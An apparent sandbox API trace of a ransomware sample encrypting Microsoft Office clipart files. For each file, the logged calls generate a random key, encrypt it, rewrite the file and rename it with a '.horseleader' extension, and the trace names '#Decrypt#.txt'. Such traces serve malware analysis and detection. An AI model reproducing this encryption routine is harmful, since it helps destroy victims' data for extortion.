FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26ff3400, ftCreationTime.dwHighDateTime=0x1bd50af, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x26ff3400, ftLastWriteTime.dwHighDateTime=0x1bd50af, nFileSizeHigh=0x0, nFileSizeLow=0x1f6, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00092_.GIF", cAlternateFileName="")) returned 1 [0252.412] lstrcmpiW (lpString1="AG00092_.GIF", lpString2="Windows") returned -1 [0252.412] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 67 [0252.412] StrStrIW (lpFirst="AG00092_.GIF", lpSrch=".horseleader") returned 0x0 [0252.412] lstrcmpW (lpString1="AG00092_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.412] lstrcmpW (lpString1="AG00092_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.412] lstrlenW (lpString=".testttjffg") returned 11 [0252.412] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.412] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.412] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.412] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.413] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 67 [0252.413] StrStrW (lpFirst="AG00092_.GIF", lpSrch=".txt") returned 0x0 [0252.413] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=502) returned 1 [0252.413] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1f6, lpOverlapped=0x0) returned 1 [0252.415] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffe0a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.415] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1f6, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1f6, lpOverlapped=0x0) returned 1 [0252.415] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.415] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.415] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.415] CloseHandle (hObject=0x158) returned 1 [0252.416] GetProcessHeap () returned 0x780000 [0252.416] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.416] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF.horseleader") returned 79 [0252.416] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif.horseleader")) returned 1 [0252.419] GetProcessHeap () returned 0x780000 [0252.419] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.419] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ef57700, ftCreationTime.dwHighDateTime=0x1bd4f8b, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4ef57700, ftLastWriteTime.dwHighDateTime=0x1bd4f8b, nFileSizeHigh=0x0, nFileSizeLow=0x319e, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00103_.GIF", cAlternateFileName="")) returned 1 [0252.419] lstrcmpiW (lpString1="AG00103_.GIF", lpString2="Windows") returned -1 [0252.419] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 67 [0252.419] StrStrIW (lpFirst="AG00103_.GIF", lpSrch=".horseleader") returned 0x0 [0252.419] lstrcmpW (lpString1="AG00103_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.419] lstrcmpW (lpString1="AG00103_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.419] lstrlenW (lpString=".testttjffg") returned 11 [0252.419] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.420] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.420] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.420] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.421] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 67 [0252.421] StrStrW (lpFirst="AG00103_.GIF", lpSrch=".txt") returned 0x0 [0252.421] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=12702) returned 1 [0252.421] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x319e, lpOverlapped=0x0) returned 1 [0252.424] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffce62, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.424] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x319e, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x319e, lpOverlapped=0x0) returned 1 [0252.424] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.424] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.424] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.425] CloseHandle (hObject=0x158) returned 1 [0252.425] GetProcessHeap () returned 0x780000 [0252.425] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.425] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF.horseleader") returned 79 [0252.425] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif.horseleader")) returned 1 [0252.426] GetProcessHeap () returned 0x780000 [0252.426] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.426] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf316a100, ftCreationTime.dwHighDateTime=0x1bd4bcc, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf316a100, ftLastWriteTime.dwHighDateTime=0x1bd4bcc, nFileSizeHigh=0x0, nFileSizeLow=0xd9c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00120_.GIF", cAlternateFileName="")) returned 1 [0252.426] lstrcmpiW (lpString1="AG00120_.GIF", lpString2="Windows") returned -1 [0252.426] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 67 [0252.426] StrStrIW (lpFirst="AG00120_.GIF", lpSrch=".horseleader") returned 0x0 [0252.426] lstrcmpW (lpString1="AG00120_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.426] lstrcmpW (lpString1="AG00120_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.426] lstrlenW (lpString=".testttjffg") returned 11 [0252.426] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.426] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.427] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.427] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.427] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 67 [0252.427] StrStrW (lpFirst="AG00120_.GIF", lpSrch=".txt") returned 0x0 [0252.427] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3484) returned 1 [0252.427] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xd9c, lpOverlapped=0x0) returned 1 [0252.429] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff264, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.429] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xd9c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xd9c, lpOverlapped=0x0) returned 1 [0252.430] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.430] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.430] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.430] CloseHandle (hObject=0x158) returned 1 [0252.430] GetProcessHeap () returned 0x780000 [0252.430] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.430] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF.horseleader") returned 79 [0252.430] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif.horseleader")) returned 1 [0252.431] GetProcessHeap () returned 0x780000 [0252.431] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.431] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33bee00, ftCreationTime.dwHighDateTime=0x1bd50af, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x33bee00, ftLastWriteTime.dwHighDateTime=0x1bd50af, nFileSizeHigh=0x0, nFileSizeLow=0xc44, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00126_.GIF", cAlternateFileName="")) returned 1 [0252.431] lstrcmpiW (lpString1="AG00126_.GIF", lpString2="Windows") returned -1 [0252.432] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 67 [0252.432] StrStrIW (lpFirst="AG00126_.GIF", lpSrch=".horseleader") returned 0x0 [0252.432] lstrcmpW (lpString1="AG00126_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.432] lstrcmpW (lpString1="AG00126_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.432] lstrlenW (lpString=".testttjffg") returned 11 [0252.432] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.432] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.432] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.432] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.433] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 67 [0252.433] StrStrW (lpFirst="AG00126_.GIF", lpSrch=".txt") returned 0x0 [0252.433] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3140) returned 1 [0252.433] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xc44, lpOverlapped=0x0) returned 1 [0252.435] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff3bc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.435] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xc44, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xc44, lpOverlapped=0x0) returned 1 [0252.436] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.436] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.436] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.436] CloseHandle (hObject=0x158) returned 1 [0252.436] GetProcessHeap () returned 0x780000 [0252.436] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.436] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF.horseleader") returned 79 [0252.436] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif.horseleader")) returned 1 [0252.437] GetProcessHeap () returned 0x780000 [0252.437] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.437] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd99400, ftCreationTime.dwHighDateTime=0x1bd50af, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd99400, ftLastWriteTime.dwHighDateTime=0x1bd50af, nFileSizeHigh=0x0, nFileSizeLow=0x30c2, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00129_.GIF", cAlternateFileName="")) returned 1 [0252.438] lstrcmpiW (lpString1="AG00129_.GIF", lpString2="Windows") returned -1 [0252.438] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 67 [0252.438] StrStrIW (lpFirst="AG00129_.GIF", lpSrch=".horseleader") returned 0x0 [0252.438] lstrcmpW (lpString1="AG00129_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.438] lstrcmpW (lpString1="AG00129_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.438] lstrlenW (lpString=".testttjffg") returned 11 [0252.438] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.438] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.438] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.438] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.439] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 67 [0252.439] StrStrW (lpFirst="AG00129_.GIF", lpSrch=".txt") returned 0x0 [0252.439] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=12482) returned 1 [0252.439] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x30c2, lpOverlapped=0x0) returned 1 [0252.441] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffcf3e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.441] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x30c2, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x30c2, lpOverlapped=0x0) returned 1 [0252.442] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.442] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.442] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.442] CloseHandle (hObject=0x158) returned 1 [0252.442] GetProcessHeap () returned 0x780000 [0252.443] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.443] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF.horseleader") returned 79 [0252.443] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif.horseleader")) returned 1 [0252.444] GetProcessHeap () returned 0x780000 [0252.444] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.444] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xffa86700, ftCreationTime.dwHighDateTime=0x1bd50ae, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xffa86700, ftLastWriteTime.dwHighDateTime=0x1bd50ae, nFileSizeHigh=0x0, nFileSizeLow=0x1485, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00130_.GIF", cAlternateFileName="")) returned 1 [0252.444] lstrcmpiW (lpString1="AG00130_.GIF", lpString2="Windows") returned -1 [0252.444] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 67 [0252.444] StrStrIW (lpFirst="AG00130_.GIF", lpSrch=".horseleader") returned 0x0 [0252.444] lstrcmpW (lpString1="AG00130_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.444] lstrcmpW (lpString1="AG00130_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.444] lstrlenW (lpString=".testttjffg") returned 11 [0252.444] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.444] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.444] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.444] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.445] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 67 [0252.445] StrStrW (lpFirst="AG00130_.GIF", lpSrch=".txt") returned 0x0 [0252.445] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5253) returned 1 [0252.445] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1485, lpOverlapped=0x0) returned 1 [0252.447] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffeb7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 